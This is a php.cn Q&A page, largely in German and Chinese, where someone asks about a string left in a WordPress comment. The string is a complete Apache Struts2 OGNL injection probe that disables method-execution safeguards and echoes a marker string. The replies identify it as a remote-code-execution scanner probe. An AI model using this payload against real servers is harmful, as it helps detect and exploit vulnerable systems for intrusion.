Heim > Backend-Entwicklung > PHP-Tutorial > javascript – Jemand hat dies in einem WordPress-Kommentar geschrieben, wozu dient dieser Code?

javascript – Jemand hat dies in einem WordPress-Kommentar geschrieben, wozu dient dieser Code?

WBOY
Freigeben: 2016-09-29 09:33:02
Original
1163 Leute haben es durchsucht

' (#context[“xwork.MethodAccessor.denyMethodExecution“]=new java.lang.Boolean(false),#_memberAccess[“allowStaticMethodAccess“]=new java.lang.Boolean(true),#_memberAccess.excludeProperties= {},#a_str='814F60BD-F6DF-4227-',#b_str='86F5-8D9FBF26A2EB',#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(# a_str #b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close()) '

回复内容:

' (#context[“xwork.MethodAccessor.denyMethodExecution“]=new java.lang.Boolean(false),#_memberAccess[“allowStaticMethodAccess“]=new java.lang.Boolean(true),#_memberAccess.excludeProperties= {},#a_str='814F60BD-F6DF-4227-',#b_str='86F5-8D9FBF26A2EB',#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(# a_str #b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close()) '

印象中有这么一个java的struts2框架远程执行任意代码的漏洞

一般这种都是扫漏洞的脚本所为,如果不是用的只是wordpress,那你装一个防止垃圾评论的插件即可,不影响

Verwandte Etiketten:
Quelle:php.cn
Erklärung dieser Website
Der Inhalt dieses Artikels wird freiwillig von Internetnutzern beigesteuert und das Urheberrecht liegt beim ursprünglichen Autor. Diese Website übernimmt keine entsprechende rechtliche Verantwortung. Wenn Sie Inhalte finden, bei denen der Verdacht eines Plagiats oder einer Rechtsverletzung besteht, wenden Sie sich bitte an admin@php.cn
Beliebte Tutorials
Mehr>
Neueste Downloads
Mehr>
Web-Effekte
Quellcode der Website
Website-Materialien
Frontend-Vorlage